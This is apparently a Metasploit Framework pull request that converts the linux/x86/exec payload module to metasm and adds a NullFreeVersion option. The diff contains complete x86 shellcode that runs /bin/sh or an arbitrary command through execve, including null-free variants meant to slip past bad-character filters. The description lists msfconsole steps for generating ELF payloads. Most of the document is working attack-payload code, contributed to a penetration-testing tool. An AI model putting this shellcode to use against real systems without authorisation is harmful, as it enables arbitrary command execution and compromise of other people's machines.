### PR TITLE
payload/x86/exec.rb - refactoring, metasm, new NullFreeVersion option

### DIFF
--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -38,13 +38,13 @@ module MetasploitModule
       ])
     register_advanced_options(
       [
-        OptBool.new('NullFreeVersion', [ false, "Null-free shellcode version", false ])
+        OptBool.new('NullFreeVersion', [ true, "Null-free shellcode version", false ])
       ])
   end
 
   def generate_stage(opts={})
     cmd             = datastore['CMD'] || ''
-    nullfreeversion = datastore['NullFreeVersion'] || false
+    nullfreeversion = datastore['NullFreeVersion']
     if !cmd.empty?
       #
       # Dynamically builds the exec payload based on the user's options.

--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -25,7 +25,8 @@ module MetasploitModule
       'Author'        => ['vlad902',
                           'Geyslan G. Bem <geyslan[at]gmail.com>'],
       'License'       => MSF_LICENSE,
-      'References'    => [ ['URL', 'https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm'] ],
+      'References'    => [ ['URL', 'https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm'],
+                           ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm'] ],
       'Platform'      => 'linux',
       'Arch'          => ARCH_X86
     ))
@@ -35,47 +36,112 @@ module MetasploitModule
       [
         OptString.new('CMD',  [ false,  "The command string to execute" ]),
       ])
+    register_advanced_options(
+      [
+        OptBool.new('NullFreeVersion', [ false, "Null-free shellcode version", false ])
+      ])
   end
 
   def generate_stage(opts={})
-    cmd = datastore['CMD'] || ''
+    cmd             = datastore['CMD'] || ''
+    nullfreeversion = datastore['NullFreeVersion'] || false
     if !cmd.empty?
       #
       # Dynamically builds the exec payload based on the user's options.
+      # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)
       #
-      payload = <<-EOS
-          push 0xb
-          pop eax
-          cdq
-          push edx
-          ; pushw 0x632d   ; (metasm doesn't support pushw)
-          dd 0x632d6866    ; "-c"
-          mov edi, esp
-          push 0x0068732f  ; "/sh\0"
-          push 0x6e69622f  ; "/bin"
-          mov ebx, esp
-          push edx
-          call continue
-          db "#{cmd}", 0x00
-        continue:
-          push edi
-          push ebx
-          mov ecx, esp
-          int 0x80
-      EOS
+      pushw_c_opt = "dd 0x632d6866" # pushw 0x632d (metasm doesn't support pushw)
+      if !nullfreeversion
+        # 36 bytes without cmd (not null-free)
+        payload = <<-EOS
+            push 0xb
+            pop eax
+            cdq
+            push edx
+            #{pushw_c_opt}   ; "-c"
+            mov edi, esp
+            push 0x0068732f  ; "/sh\0"
+            push 0x6e69622f  ; "/bin"
+            mov ebx, esp
+            push edx
+            call continue
+            db "#{cmd}", 0x00
+          continue:
+            push edi
+            push ebx
+            mov ecx, esp
+            int 0x80
+        EOS
+      else
+        if cmd.length > 0xffff
+          raise RangeError, "CMD length has to be smaller than %d" % 0xffff, caller()
+        end
+        if cmd.length <= 0xff # 255
+          breg = "bl"
+        else
+          breg = "bx"
+          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += " "
+          end
+        end
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
+        # 47/49 bytes without cmd (not null-free)
+        payload  = <<-EOS
+            xor ebx, ebx
+            mul ebx
+            mov al, 0xb
+            push edx
+            #{pushw_c_opt}         ; "-c"
+            mov edi, esp
+            jmp tocall             ; jmp/call/pop cmd address
+          afterjmp:
+            pop esi                ; pop cmd address into esi
+            #{mov_cmd_len_to_breg} ; mov (byte/word) (bl/bx), cmd.length
+            mov [esi+ebx], dl      ; NUL '\0' terminate cmd
+            push edx
+            push 0x68732f2f        ; "//sh"
+            push 0x6e69622f        ; "/bin"
+            mov ebx, esp
+            push edx
+            push esi
+            push edi
+            push ebx
+            mov ecx, esp
+            int 0x80
+          tocall:
+            call afterjmp          ; call/pop cmd address
+            db "#{cmd}"
+        EOS
+      end
     else
       #
-      # execve("/bin/sh", NULL, NULL) - 20 bytes (not null-free)
+      # Builds the exec payload which executes a /bin/sh shell.
+      # execve("/bin/sh", NULL, NULL)
       #
-      payload = <<-EOS
-          xor ecx, ecx	   ; ecx = NULL
-          mul ecx		       ; eax and edx = NULL
-          mov al, 0xb	     ; execve syscall
-          push 0x0068732f  ; "/sh\0"
-          push 0x6e69622f	 ; "/bin"
-          mov ebx, esp	   ; pointer to "/bin/sh\0" cmd
-          int 0x80	       ; bingo
-      EOS
+      if !nullfreeversion
+        # 20 bytes (not null-free)
+        payload = <<-EOS
+            xor ecx, ecx     ; ecx = NULL
+            mul ecx          ; eax and edx = NULL
+            mov al, 0xb      ; execve syscall
+            push 0x0068732f  ; "/sh\0"
+            push 0x6e69622f  ; "/bin"
+            mov ebx, esp     ; pointer to "/bin/sh\0" cmd
+            int 0x80         ; bingo
+        EOS
+      else
+        # 21 bytes (null-free)
+        payload = <<-EOS
+            xor ecx, ecx     ; ecx = NULL
+            mul ecx          ; eax and edx = NULL
+            mov al, 0xb      ; execve syscall
+            push ecx         ; string '\0'
+            push 0x68732f2f  ; "//sh"
+            push 0x6e69622f  ; "/bin"
+            mov ebx, esp     ; pointer to "/bin/sh\0" cmd
+            int 0x80         ; bingo
+        EOS
+      end
     end
     Metasm::Shellcode.assemble(Metasm::Ia32.new, payload).encode_string
   end


### PR DESCRIPTION
## Changes

As proposed in PR https://github.com/rapid7/metasploit-framework/pull/14636 comments.

`commit 34223874b657e02066e24cd9dfc96769e052d2ff`

Converts shellcode to metasm and adds new behaviour to CMD option.

Now if CMD is empty or unset, a 20 byte not null-free execve payload is build. **The arbitrary command option continues the same when CMD is set**.

`commit 4ed8bd80526f4741f853fdd9d61fedc206f342dd`

Adds the `OptBool` `NullFreeVersion` **advanced** option.

Its default value is false. When set as true, `generate` will output a self included null-free version of the payload without need of encoding.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use payload/linux/x86/exec`
- [ ] `options`
- [ ] `advanced`
- [ ] `unset CMD`
- [ ] Test it `generate -f elf -o exec32.elf`
- [ ] `set NullFreeVersion true`
- [ ] Test it `generate -f elf -o exec32.elf`
- [ ] `set NullFreeVersion false`
- [ ] Set your arbitrary command `set CMD uname -a`
- [ ] Test it `generate -f elf -o exec32.elf`
- [ ] `set NullFreeVersion true`
- [ ] Test it `generate -f elf -o exec32.elf`

![image](https://user-images.githubusercontent.com/3372117/105885334-c741e280-5fe7-11eb-827c-662307778dd2.png)

